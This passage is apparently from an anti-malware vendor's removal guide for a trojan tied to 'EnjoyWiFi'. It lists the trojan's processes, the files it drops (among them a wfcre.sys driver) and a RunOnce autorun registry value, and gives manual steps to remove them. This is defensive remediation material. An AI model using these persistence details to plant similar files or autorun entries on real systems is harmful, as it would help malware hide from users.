    enjoyWIFI.exe:4004
    enjoyWIFI.exe:3396
    cvtres.exe:4000
    cvtres.exe:576
    cvtres.exe:1376
    enjoyWIFI.tmp:1056
    starter.exe:1084
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (4304 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (2490 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (3662 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (23 bytes)
    %Program Files%\EnjoyWiFi\inst.db (5 bytes)
    %Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
    %Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
    %Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
    %Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
    C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
    C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
    %Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (29506 bytes)
    C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
    %Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
    %Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
    %Program Files%\EnjoyWiFi\zlib.dll (925 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe (185379 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\513488b4c2f64a4a9f5a9d95e2668ace\enjoyWIFI.exe (202246 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (1444 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (5572 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe (205485 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-RP795.tmp\enjoyWIFI.tmp (1832 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (1832 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (3658 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_RegDLL.tmp (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\HelpTool.dll (8020 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (8020 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (15262 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rsl2960.tmp (1 bytes)
    

    5. 

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "%original file name%.exe" = "c:\%original file name%.exe"
    

    6. 

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    7. 

  7. Reboot the computer.
    8. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now